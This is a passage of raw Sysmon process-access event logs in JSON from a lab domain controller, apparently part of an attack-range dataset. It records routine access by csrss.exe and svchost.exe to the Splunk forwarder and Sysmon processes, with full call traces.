Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3830,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:42.614\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-1FFE-5F25-0000-001076D10500}\r\nTargetProcessId: 4476\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:42.614","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FFE-5F25-0000-001076D10500}","TargetProcessId":"4476","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3831,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:42.614\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:42.614","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3832,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:42.614\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:42.614","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3833,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:42.614\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:42.614","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3834,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:42.614\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:42.614","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3835,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:42.614\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:42.614","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3836,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:42.614\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:42.614","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3837,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:42.614\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:42.614","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
